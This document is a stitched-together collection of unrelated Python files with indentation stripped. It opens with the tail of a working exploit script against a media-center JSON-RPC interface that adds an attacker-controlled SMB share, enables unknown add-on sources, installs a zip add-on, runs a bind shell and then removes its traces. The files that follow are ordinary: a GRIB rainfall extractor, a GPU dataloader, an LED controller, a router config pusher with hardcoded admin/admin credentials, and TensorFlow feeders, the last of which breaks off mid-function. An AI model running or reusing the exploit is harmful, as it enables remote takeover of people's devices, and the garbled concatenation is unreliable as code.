do_action_request(args.rip, args.rport, "pageup")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# Page down to 'add source'
do_action_request(args.rip, args.rport, "pagedown")
do_input_request(args.rip, args.rport, "Input.Select")
# Cancel may or may not be selected. Try to go down two times and then back up two times to input
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# Add file source pops. Hit select to add what we want [note this can go bad depending if cancel or none is selected]
time.sleep(1)
do_send_text(args.rip, args.rport, "smb://" + args.lip + "/00000000/")
time.sleep(1)
# Move to ok and hit enter
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# We just created an attacker owned source! High five!
# Back to home
do_input_request(args.rip, args.rport, "Input.Home")
# Into settings
do_input_request(args.rip, args.rport, "Input.Select")
# Into System
do_input_request(args.rip, args.rport, "Input.Down")
do_action_request(args.rip, args.rport, "pagedown")
do_input_request(args.rip, args.rport, "Input.Select")
# Here we assume "standard" layout. In basic, add-ons is the last item
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Right")
# Enable unknown sources
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# Yes we are sure
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# Back to home
do_input_request(args.rip, args.rport, "Input.Home")
# Into settings
do_input_request(args.rip, args.rport, "Input.Select")
# Back up and right to add-ons
do_action_request(args.rip, args.rport, "pageup")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Right")
do_input_request(args.rip, args.rport, "Input.Select")
# Up two to "Install from zip file" (go up since extra fields might exist)
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Up")
do_input_request(args.rip, args.rport, "Input.Select")
# our smb share "0000000" should be the first one due to alphabetical ordering (alphanum first)
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Select")
# should be only one entry in our directory
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Select")
print("[+] Pausing for install to take affect...")
time.sleep(5)
# execute the shell
url = 'http://' + args.rip + ':' + args.rport + '/jsonrpc'
data = '[{"jsonrpc":"2.0","method":"Addons.ExecuteAddon","params":{"addonid":"script.bind.shell.1270"},"id":10}]'
resp = requests.post(url, data = data)
if resp.status_code == 200:
print '[+] Success!'
# return to main menu
do_input_request(args.rip, args.rport, "Input.Home")
if args.clean != None:
print '[+] Attempting to clean remove SMB source...'
# Into settings
do_input_request(args.rip, args.rport, "Input.Select")
# Right to filemanager
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# Page up to the top of the left. And right to top of the right
do_action_request(args.rip, args.rport, "pageup")
do_input_request(args.rip, args.rport, "Input.Right")
# pop up the context menu
do_input_request(args.rip, args.rport, "Input.ContextMenu")
# down two to remove source
do_input_request(args.rip, args.rport, "Input.Down")
do_input_request(args.rip, args.rport, "Input.Down")
# remove the source
do_input_request(args.rip, args.rport, "Input.Select")
time.sleep(1)
# yes, we're sure
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Select")
# move back to an exploitable state
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Home")
do_input_request(args.rip, args.rport, "Input.Left")
do_input_request(args.rip, args.rport, "Input.Down")
else:
print('[+] Sleeping for 10 minutes before quitting.')
time.sleep(600)
else:
print '[-] Failure! Host left in unknown state... gonna sleep'
time.sleep(600)
print("[+] Done :)")
|
Rainfall_multiprocess_WEBSERVER_2020_esas.py
|
#
# Copyright 2005-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities granted to it by
# virtue of its status as an intergovernmental organisation nor does it submit to any jurisdiction.
#
from __future__ import print_function
import traceback
import sys
import time
import datetime
from random import randint
from multiprocessing import Process
from threading import Thread
from eccodes import *
INPUT = '../../data/reduced_latlon_surface.grib1'
VERBOSE = 1 # verbose error reporting
missingValue = 1e+20 # A value out of range
#def example(INPUT):
#def example(INPUT,y,yarr):
def example(INPUT,OUT,w,m,y,yarr):
indexarray = yarr.split(",");
forthenameoffile = yarr.replace(",","_");
test = datetime.datetime.now();
# name = "GribIndexPoints_"+forthenameoffile+"_"+m+"_"+y+"_" +OUT+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_started_"+test.strftime("%d_%m_%Y_%H_%M")+".csv";
# name = OUT+"_"+y+"_"+m+"_SWIMFull_started_"+test.strftime("%d_%m_%Y_%H:%M")+".csv";
f = open(INPUT, 'rb')
f2 = open('../../files/'+name, "a")
#critics ? ;)
# f2.write("index,lat,lon,value,timestamp,name,shortname,units\n")
if w=='true':
sys.stdout.write("index,lat,lon,value,timestamp,name,shortname,units\n")
f2.write("index,lat,lon,value,dataDate,dataTime,validityDate,validityTime,name,shortname,units\n")
while 1:
gid = codes_grib_new_from_file(f)
if gid is None:
break
# Set the value representing the missing value in the field.
# Choose a missingValue that does not correspond to any real value in the data array
codes_set(gid, "missingValue", missingValue)
iterid = codes_grib_iterator_new(gid, 0)
i = 0
while 1:
result = codes_grib_iterator_next(iterid)
if not result:
break
for x in indexarray:
if i==int(x): #and (codes_get(iterid,'day')==1 or codes_get(iterid,'day')==14 or codes_get(iterid,'day')==25):
[lat, lon, value] = result
# sys.stdout.write("- %d - lat=%.6e lon=%.6e value=" % (i, lat, lon))
# if value == missingValue:
# print("missing")
# else:
# print("%.6f" % value)
timestamp = ""
if codes_get(iterid, 'day') < 10:
timestamp = timestamp+"0"+str(codes_get(iterid, 'day'))
else:
timestamp = timestamp+str(codes_get(iterid, 'day'))
timestamp = timestamp+"-"+str(codes_get(iterid, 'month'))+"-"+str(codes_get(iterid, 'year'))
if codes_get(iterid, 'validityTime') == 0:
timestamp = timestamp+" 00:00:00"
elif codes_get(iterid, 'validityTime') < 1000:
eben = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" 0"+eben[0]+":00:00"
else:
eben2 = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" "+eben2[0]+eben2[1]+":00:00"
# print ("TIME - %s" % (timestamp))
sys.stdout.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, timestamp, codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
# f2.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, timestamp, codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
f2.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, codes_get(iterid, 'dataDate'), codes_get(iterid, 'dataTime'), codes_get(iterid, 'validityDate'), codes_get(iterid, 'validityTime'), codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
# i += 1
i += 1
codes_grib_iterator_delete(iterid)
codes_release(gid)
f.close()
def main():
try:
year=sys.argv[1]
yar=sys.argv[2]
except CodesInternalError as err:
if VERBOSE:
traceback.print_exc(file=sys.stderr)
else:
sys.stderr.write(err.msg + '\n')
return 1
if __name__ == "__main__":
# sys.exit(main())
year=sys.argv[1]
month=sys.argv[2]
yar=sys.argv[3]
if(int(month)<10):
smonth='0'+month;
else:
smonth=month;
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+year+'_12_33_105_10_0_FC3hr',year,yar)).start()
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+str(int(year)+1)+'_01_33_105_10_0_FC3hr',str(int(year)+1),yar)).start()
# example('MERA_PRODYEAR_2016_12_61_105_0_4_FC33hr','TotalPrecip')
Process(target = example,args=('/var/www/html/mera/map/backup/thread/Rainfall/MERA_PRODYEAR_'+year+'_'+smonth+'_61_105_0_4_FC33hr','TotalPrecip','true',smonth,year,yar)).start()
|
backend.py
|
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import queue
import threading
from collections import OrderedDict
import cudf
import cupy as cp
from cudf.utils.dtypes import is_list_dtype
from nvtabular.io.shuffle import _shuffle_df
from nvtabular.ops import _get_embedding_order
def _num_steps(num_samples, step_size):
return (num_samples - 1) // step_size + 1
class ChunkQueue:
"""This class takes partitions (parts) from an NVTabular dataset
and concatenates them into a cudf dataframe "chunk". This chunk
is subsequently transformed into its tensor representation using
the iterator's transform.
Parameters
-----------
qsize: int
Max number of elements to hold in the buffer at once
num_parts : int
number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk"
shuffle : bool
enable/disable chunk-level shuffling
put_wait: float
amount of timeout to wait for a full queue to open up
before checking for errors and trying again
"""
def __init__(self, qsize, num_parts=1, shuffle=False, put_wait=1e-6):
self.num_parts = num_parts
self.shuffle = shuffle
self.put_wait = put_wait
self.q_out = queue.Queue(qsize)
self._stop_event = threading.Event()
@property
def stopped(self):
return self._stop_event.is_set()
@property
def empty(self):
return self.q_out.empty()
def get(self):
return self.q_out.get()
def put(self, packet):
while True:
if self.stopped:
return True
try:
self.q_out.put(packet, timeout=self.put_wait)
return False
except queue.Full:
continue
def batch(self, itr):
"""
iterates through gpu_mem_frac size chunks of dataset
and concatenates every `num_parts` of them.
"""
current = []
while True:
try:
value = next(itr)
except StopIteration:
if len(current) > 0:
yield current
break
current.append(value)
if len(current) == self.num_parts:
yield current
current = []
def load_chunks(self, dev, dataloader):
try:
indices = dataloader._gather_indices_for_dev(dev)
itr = iter(dataloader.data.to_iter(indices=indices))
with dataloader._get_device_ctx(dev):
spill = None
for chunks in self.batch(itr):
if self.stopped:
return
if spill and not spill.empty:
chunks.insert(0, spill)
chunks = cudf.core.reshape.concat(chunks)
chunks.reset_index(drop=True, inplace=True)
chunks, spill = self.get_batch_div_chunk(chunks, dataloader.batch_size)
if self.shuffle:
_shuffle_df(chunks)
if len(chunks) > 0:
chunks = dataloader.make_tensors(chunks, dataloader._use_nnz)
# put returns True if buffer is stopped before
# packet can be put in queue. Keeps us from
# freezing on a put on a full queue
if self.put(chunks):
return
chunks = None
# takes care final batch, which is less than batch size
if spill is not None and not spill.empty:
spill = dataloader.make_tensors(spill, dataloader._use_nnz)
self.put(spill)
except Exception as e:
self.put(e)
# For when an iterator is stopped before iteration is complete.
def stop(self):
self._stop_event.set()
# TODO: should we be clearing? I can imagine a world where
# you want the thread to stop but still want to grab
# data out of the buffer
self.q_out.queue.clear()
def start(self):
self._stop_event.clear()
def get_batch_div_chunk(self, chunks, batch_size):
# TODO: is there a way to do this using cupy?
spill_idx = int(chunks.shape[0] / batch_size) * batch_size
spill = cudf.DataFrame(chunks.iloc[spill_idx:])
chunks = cudf.DataFrame(chunks.iloc[:spill_idx])
if not chunks.empty:
chunks.reset_index(drop=True, inplace=True)
if not spill.empty:
spill.reset_index(drop=True, inplace=True)
return chunks, spill
# TODO: implement as metaclass and assign methods to children
# to avoid having to do Dataset.<method> calls?
class DataLoader:
_use_nnz = False
def __init__(
self,
dataset,
cat_names,
cont_names,
label_names,
batch_size,
shuffle,
parts_per_chunk=1,
devices=None,
):
self.data = dataset
self.indices = cp.arange(dataset.to_ddf().npartitions)
devices = devices or [0]
self.cat_names = cat_names or []
self.cont_names = cont_names or []
self.label_names = label_names
self.batch_size = batch_size
self.shuffle = shuffle
self.devices = devices
self.num_rows_processed = 0
self._buff = ChunkQueue(len(devices), num_parts=parts_per_chunk, shuffle=shuffle)
self._batch_itr = None
self._workers = None
def __len__(self):
return _num_steps(self.data.num_rows, self.batch_size)
@property
def _working(self):
if self._workers is not None:
return any([t.is_alive() for t in self._workers])
return False
def stop(self):
# TODO: raise warning or even error if condition
# isn't met?
if self._workers is not None and self._working:
if not self._buff.stopped:
self._buff.stop()
for t in self._workers:
t.join()
self._buff.q_out.queue.clear()
self._batch_itr = None
def _gather_indices_for_dev(self, dev):
per_worker = _num_steps(len(self.indices), len(self.devices))
worker_id = self.devices.index(dev)
start = worker_id * per_worker
return self.indices[start : start + per_worker].tolist()
def __iter__(self):
self.stop()
self.num_rows_processed = 0
if self._buff.stopped:
self._buff.start()
# shuffle partition indices to bring disparate
# parts of the dataset "close" to one another
if self.shuffle:
cp.random.shuffle(self.indices)
# build and start new threads for loading and
# concatenating data
self._workers = []
for dev in self.devices:
t = threading.Thread(target=self._buff.load_chunks, args=(dev, self))
t.daemon = True
t.start()
self._workers.append(t)
return self
def __next__(self):
return self._get_next_batch()
def _fetch_chunk(self):
chunks = self._buff.get()
if isinstance(chunks, Exception):
self.stop()
raise chunks
self._batch_itr = iter(chunks)
def _get_next_batch(self):
"""
adding this cheap shim so that we can call this
step without it getting overridden by the
framework-specific parent class's `__next__` method.
TODO: can this be better solved with a metaclass
implementation? My gut is that we don't actually
necessarily *want*, in general, to be overriding
__next__ and __iter__ methods
"""
# we've never initialized, do that now
# need this because tf.keras.Model.fit will
# call next() cold
if self._workers is None:
DataLoader.__iter__(self)
# get the first chunks
if self._batch_itr is None:
self._fetch_chunk()
# try to iterate through existing batches
try:
batch = next(self._batch_itr)
except StopIteration:
# anticipate any more chunks getting created
# if not, raise the StopIteration
if not self._working and self._buff.empty:
self._workers = None
self._batch_itr = None
raise StopIteration
# otherwise get the next chunks and return
# the first batch
self._fetch_chunk()
batch = next(self._batch_itr)
# if batch[0] is empty but other exist
for sub in batch:
if sub is not None and len(sub) > 0:
self.num_rows_processed += len(sub)
break
return batch
def make_tensors(self, gdf, use_nnz=False):
split_idx = self._get_segment_lengths(len(gdf))
# map from big chunk to framework-specific tensors
chunks = self._create_tensors(gdf)
# if we have any offsets, calculate nnzs up front
if len(chunks) == 4:
offsets = chunks[-1]
if use_nnz:
nnzs = offsets[1:] - offsets[:-1]
chunks = chunks[:-1]
# split them into batches and map to the framework-specific output format
batches = [[] for _ in range(len(split_idx))]
offset_idx = 0
for chunk in chunks:
lists = None
if isinstance(chunk, tuple):
chunk, lists = chunk
if len(split_idx) > 1 and chunk is not None:
chunk = self._split_fn(chunk, split_idx)
else:
chunk = [chunk for _ in split_idx]
if lists is not None:
num_list_columns = len(lists)
# grab the set of offsets and nnzs corresponding to
# the list columns from this chunk
chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns]
if use_nnz:
chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns]
offset_idx += num_list_columns
# split them into batches, including an extra 1 on the offsets
# so we know how long the very last element is
batch_offsets = self._split_fn(chunk_offsets, split_idx + [1])
if use_nnz and len(split_idx) > 1:
batch_nnzs = self._split_fn(chunk_nnzs, split_idx)
elif use_nnz:
batch_nnzs = [chunk_nnzs]
else:
batch_nnzs = [None] * (len(batch_offsets) - 1)
# group all these indices together and iterate through
# them in batches to grab the proper elements from each
# values tensor
chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs)
for n, c in enumerate(chunk):
if isinstance(c, tuple):
c, off0s, off1s, _nnzs = c
offsets_split_idx = [1 for _ in range(num_list_columns)]
off0s = self._split_fn(off0s, offsets_split_idx, axis=1)
off1s = self._split_fn(off1s, offsets_split_idx, axis=1)
if use_nnz:
_nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1)
# TODO: does this need to be ordereddict?
batch_lists = {}
for k, (column_name, values) in enumerate(lists.items()):
off0, off1 = off0s[k], off1s[k]
if use_nnz:
nnz = _nnzs[k]
# need to grab scalars for TF case
if len(off0.shape) == 1:
start, stop = off0[0], off1[0]
elif len(off0.shape) == 2:
start, stop = off0[0, 0], off1[0, 0]
else:
print(off0, off1)
raise ValueError
value = values[start:stop]
index = off0 - start if not use_nnz else nnz
batch_lists[column_name] = (value, index)
c = (c, batch_lists)
batches[n].append(c)
return [self._handle_tensors(*batch) for batch in batches]
def _get_segment_lengths(self, num_samples):
"""
Helper function to build indices to pass
to <torch|tf>.split functions for breaking
up into batches
"""
num_full_batches = _num_steps(num_samples, self.batch_size) - 1
idx = [self.batch_size for _ in range(num_full_batches)]
idx.append(num_samples - num_full_batches * self.batch_size)
return idx
def _to_tensor(self, gdf, dtype=None):
"""
One of the mandatory functions a child class needs
to implement. Maps from a cudf DataFrame to a
tensor in the appropriate library, with an optional
dtype kwarg to do explicit casting if need be
"""
raise NotImplementedError
def _get_device_ctx(self, dev):
"""
One of the mandatory functions a child class needs
to implement. Maps from a GPU index to a framework
context object for placing tensors on specific GPUs
"""
raise NotImplementedError
def _split_fn(self, tensor, idx):
raise NotImplementedError
@property
def _LONG_DTYPE(self):
raise NotImplementedError
@property
def _FLOAT32_DTYPE(self):
raise NotImplementedError
def _separate_list_columns(self, gdf):
lists, scalars = [], []
for col in gdf.columns:
if is_list_dtype(gdf[col]):
lists.append(col)
else:
scalars.append(col)
return _get_embedding_order(scalars), _get_embedding_order(lists)
def _create_tensors(self, gdf):
"""
Breaks a dataframe down into the relevant
categorical, continuous, and label tensors.
Can be overrideen
"""
column_groups = (self.cat_names, self.cont_names, self.label_names)
dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE)
tensors = []
offsets = cudf.DataFrame()
for column_names, dtype in zip(column_groups, dtypes):
if len(column_names) == 0:
tensors.append(None)
continue
gdf_i = gdf[column_names]
gdf.drop(columns=column_names, inplace=True)
scalars, lists = self._separate_list_columns(gdf_i)
x = None
if scalars:
x = self._to_tensor(gdf_i[scalars], dtype)
if lists:
list_tensors = OrderedDict()
for column_name in lists:
column = gdf_i.pop(column_name)
leaves = column.list.leaves
list_tensors[column_name] = self._to_tensor(leaves, dtype)
offsets[column_name] = column._column.offsets
x = x, list_tensors
tensors.append(x)
if not offsets.empty:
offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE)
if len(offsets_tensor.shape) == 1:
offsets_tensor = offsets_tensor[:, None]
tensors.append(offsets_tensor)
del gdf, offsets
return tensors
def _handle_tensors(self, cats, conts, labels):
return cats, conts, labels
|
leds_controller.py
|
from server.utils import settings_utils
from server.hw_controller.leds.leds_driver import LedsDriver
from threading import Thread, Lock
class LedsController:
def __init__(self, app):
self.app = app
settings = settings_utils.load_settings()
self.dimensions = None
self.update_settings(settings)
self._should_update = False
self.mutex = Lock()
# may have problems with the leds controller if self.driver.deinit or self.stop is not called on app shutdown
def start(self):
if not self.driver is None:
self._running = True
self._th = Thread(target = self._thf, daemon=True)
self._th.name = "leds_controller"
self._th.start()
def stop(self):
self._running = False
def _thf(self):
self.app.logger.info("Leds controller started")
while(self._running):
with self.mutex:
if (self._should_update):
self.driver.fill(self._color)
self._should_update = False
self.app.logger.error("test")
self.driver.deinit()
# sets a fixed color for the leds
def set_color(self, color):
with self.mutex:
self._color = color
self._should_update = True
def start_animation(self, animation):
# TODO add animations picker:
# may add animations like:
# * a rainbow color moving around (may choose speed, saturation, direction, multiple rainbows etc)
# * random colors (maybe based on normalized 3d perlin noise and selection the nodes coordinates?)
# * custom gradients animations
# * custom colors sequences animations
# * "follow the ball" animation (may be quite difficult due to the delay between commands sent to the board and actual ball movement)
pass
# Updates dimensions of the led matrix
# Updates the led driver object only if the dimensions are changed
def update_settings(self, settings):
self.stop()
# TODO convert setting to a dotmap?
dims = (settings["leds"]["width"]["value"], settings["leds"]["height"]["value"])
if self.dimensions != dims:
self.dimensions = dims
self.driver = LedsDriver(self.dimensions)
self.leds_type = None
self.pin = None
if (self.leds_type != settings["leds"]["type"]["value"]) or (self.pin != settings["leds"]["pin1"]["value"]):
self.pin = settings["leds"]["pin1"]["value"]
self.leds_type = settings["leds"]["type"]["value"]
is_ok = False
if self.leds_type == "WS2812B":
is_ok = self.driver.use_WS2812B(self.pin)
elif self.leds_type == "Dimmable":
is_ok = self.driver.use_dimmable(self.pin)
if not is_ok:
self.driver = None
self.app.semits.show_toast_on_UI("Led driver type not compatible with current HW")
self.app.logger.error("Cannot initialize leds controller")
self.start()
|
setexabgp.py
|
from threading import Thread
from jinja2 import Template
from netmiko import ConnectHandler
from glob import glob
import yaml
devices_info = [
{"hostname": "xrv1", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.101"},
{"hostname": "xrv2", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.102"},
{"hostname": "xrv3", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.103"},
{"hostname": "xrv4", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.104"},
{"hostname": "xrv5", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.105"},
{"hostname": "xrv6", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.106"},
{"hostname": "xrv7", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.107"},
{"hostname": "xrv8", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.108"},
{"hostname": "xrv9", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.109"},
{"hostname": "xrv10", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.110"},
{"hostname": "xrv11", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.111"},
{"hostname": "xrv12", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.112"},
{"hostname": "xrv13", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.113"},
{"hostname": "xrv14", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.114"},
{"hostname": "xrv15", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.115"},
]
def get_config(hostname, temp_type):
temp_path="../config_template/"
if "xrv" in hostname:
device_type = "xrv"
elif "IOS" in hostname:
device_type = "vios"
template_file = glob(temp_path + device_type + "_" + temp_type + "*")
template = Template(open(template_file[0]).read())
data_path = "../data/"
data_file = glob(data_path + temp_type + "/" + hostname + "_*" )
data = yaml.load(open(data_file[0]).read())
if hostname.startswith("xrv"):
return template.render(**data,commit=True)
elif hostname.startswith("vIOS"):
return template.render(**data)
def set_config(device):
cfgs = get_config(device.get("hostname"), "exabgp")
print(cfgs)
del device["hostname"]
net_connect = ConnectHandler(**device)
net_connect.send_config_set(cfgs)
if __name__ == '__main__':
tasks = []
for device in devices_info:
task = Thread(target=set_config, args=(device,))
task.start()
tasks.append(task)
for task in tasks:
task.join()
|
inputs.py
|
"""
Description
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import threading, multiprocessing
from collections import OrderedDict
DTYPE_DICT = {'int32': tf.int32, 'int64': tf.int64, 'float32': tf.float32, 'float64': tf.float32}
class PythonFeeder(object):
"""
This class manages the the background threads needed to fill
a queue full of datalib.
"""
def __init__(self, dataset, batch_size=256, n_feeders=2, queue=tf.RandomShuffleQueue):
if isinstance(dataset, (list, tuple)) and len(dataset) == 2:
dataset = CompleteDataGenerator(dataset[0], dataset[1], shuffle=True, batch_size=batch_size)
self.dataset = dataset
self.batch_size = batch_size
self.n_threads = n_feeders
self.num_samples = dataset.num_samples()
self.input_info = dataset.input_info()
self.target_info = dataset.target_info()
self._stop = False
self.feeders = []
self.queue = queue
self.inputs = None
self.targets = None
self.enqueue_op = None
def request_stop(self):
self.queue.close(cancel_pending_enqueues=True)
self._stop = True
def join(self):
import time
while all([not f.isAlive() for f in self.feeders]):
time.sleep(0.1)
def build_batch(self):
"""
Return's tensors containing a batch of test_images and labels
"""
# Data Queue
min_after_dequeue = 20 * self.batch_size
capacity = min_after_dequeue + 5 * self.batch_size
names = self.input_info.keys() + self.target_info.keys()
shapes = [val['shape'] for _, val in self.input_info.iteritems()] + \
[val['shape'] for _, val in self.target_info.iteritems()]
dtypes = [DTYPE_DICT[val['dtype']] for _, val in self.input_info.iteritems()] + \
[DTYPE_DICT[val['dtype']] for _, val in self.target_info.iteritems()]
if self.queue is tf.RandomShuffleQueue:
self.queue = self.queue(names=names, shapes=shapes, dtypes=dtypes, capacity=capacity, min_after_dequeue=min_after_dequeue)
elif self.queue is tf.FIFOQueue:
self.queue = self.queue(names=names, shapes=shapes, dtypes=dtypes, capacity=capacity)
else:
raise ValueError('Unknown queue type.')
# Placeholders for feeding the queue
self.inputs = OrderedDict(
[(key, tf.placeholder(dtype=DTYPE_DICT[val['dtype']],
shape=(None,)+val['shape'],
name=key))
for key, val in self.input_info.iteritems()]
)
self.targets = OrderedDict(
[(key, tf.placeholder(dtype=DTYPE_DICT[val['dtype']],
shape=(None,)+val['shape'],
name=key))
for key, val in self.target_info.iteritems()]
)
# The symbolic operation to add datalib to the queue
enqueue_dict = dict(self.inputs.items() + self.targets.items())
self.enqueue_op = self.queue.enqueue_many(enqueue_dict)
samples = self.queue.dequeue_many(self.batch_size)
inputs = [samples[key] for key in self.input_info.keys()]
targets = [samples[key] for key in self.target_info.keys()]
return inputs, targets
def main_feed(self, sess, n):
"""
Function run on alternate thread. Basically, keep adding datalib to the queue.
"""
# import time
try:
feed_dict = {}
feed_dict.update({self.inputs[key]: None for key in self.input_info.keys()})
feed_dict.update({self.targets[key]: None for key in self.target_info.keys()})
# i = 1
# t0 = t1 = time.time()
for j, (inputs_, targets_) in enumerate(self.dataset.batch_loop()):
# t1_iter = time.time()-t1
#
# t2 = time.time()
if inputs_ is None:
break
if self._stop:
print('Stop requested. Feeder %d for queue (%s) will close...' % (n, type(self.queue).__name__))
return
for key in self.input_info.keys():
feed_dict[self.inputs[key]] = inputs_[key]
for key in self.target_info.keys():
feed_dict[self.targets[key]] = targets_[key]
# t2_iter = time.time()-t2
#
# t3 = time.time()
sess.run(self.enqueue_op, feed_dict=feed_dict)
# t3_iter = time.time()-t3
#
# if j<5:
# t0 = t1 = time.time()
# continue
#
# print('Thread %d' % n, i, feed_dict[self.targets['answer']].shape[0]*i/(time.time()-t0), t1_iter, t2_iter, t3_iter, [feed_dict[key].shape for key in feed_dict.keys()])
# i += 1
#
# t1 = time.time()
except tf.errors.CancelledError:
print('TF queue is closed. Feeder %d for queue (%s) will close...' % (n, type(self.queue).__name__))
return
def start_feeder(self, sess):
""" Start background threads to feed queue """
self.dataset.start_feeder()
self._stop = False
threads = []
for n in xrange(self.n_threads):
thread = threading.Thread(target=self.main_feed, args=(sess, n))
thread.daemon = True
thread.start()
threads.append(thread)
self.feeders = threads
class TFFeeder(object):
"""
This class manages the the background threads needed to fill
a queue full of datalib.
"""
def __init__(self, dataset, batch_size=256, n_feeders=2, n_dequeue=1, shuffle=True):
self.dataset = dataset
self.batch_size = batch_size
self.n_feeders = n_feeders
self.shuffle = shuffle
self.num_samples = dataset.num_samples()
self.n_dequeue = n_dequeue
def build_batch(self, min_after_dequeue=5, capacity=3, num_epochs=None, gpu_id=0):
with tf.device('/cpu:0'):
dataset, batch_size, n_feeders, shuffle = self.dataset, self.batch_size, self.n_feeders, self.shuffle
input_info = dataset.input_info()
target_info = dataset.target_info()
filename_queue = tf.train.string_input_producer(dataset.tfrecords_fns(), shuffle=shuffle, num_epochs=num_epochs)
dequeue_size = 1./(np.arange(self.n_dequeue, dtype=float)+3)
dequeue_size = np.ceil(dequeue_size/dequeue_size.sum()*batch_size).astype(int)
dequeue_size[0] = batch_size - dequeue_size[1:].sum() # CPU->GPU copy is not parelelized. By having smaller dequeue, CPU->GPU copies can start sooner.
inputs_batch, targets_batch = [None]*self.n_dequeue, [None]*self.n_dequeue
for i in range(self.n_dequeue):
min_after_dequeue = min_after_dequeue * dequeue_size[i]
capacity = min_after_dequeue + capacity * dequeue_size[i]
if shuffle and n_feeders == 1: batch_fnc = lambda x: tf.train.shuffle_batch(x, dequeue_size[i], capacity, min_after_dequeue)
elif shuffle and n_feeders > 1: batch_fnc = lambda x: tf.train.shuffle_batch_join(x, dequeue_size[i], capacity, min_after_dequeue)
elif not shuffle and n_feeders == 1: batch_fnc = lambda x: tf.train.batch(x, dequeue_size[i], capacity)
elif not shuffle and n_feeders > 1: batch_fnc = lambda x: tf.train.batch_join(x, dequeue_size[i], capacity)
tensors = []
for _ in range(n_feeders):
reader = tf.TFRecordReader()
_, record_serialized = reader.read(filename_queue)
inputs, targets = dataset.parse_and_prep_record(record_serialized)
tensors.append(dict([(key, inputs[key]) for key in input_info.keys()] +
[(key, targets[key]) for key in target_info.keys()]))
if n_feeders == 1:
tensors = tensors[0]
tensors_batch = batch_fnc(tensors)
inputs_batch[i] = [tensors_batch[key] for key in input_info.keys()]
targets_batch[i] = [tensors_batch[key] for key in target_info.keys()]
with tf.device(gpu_id):
if self.n_dequeue>1:
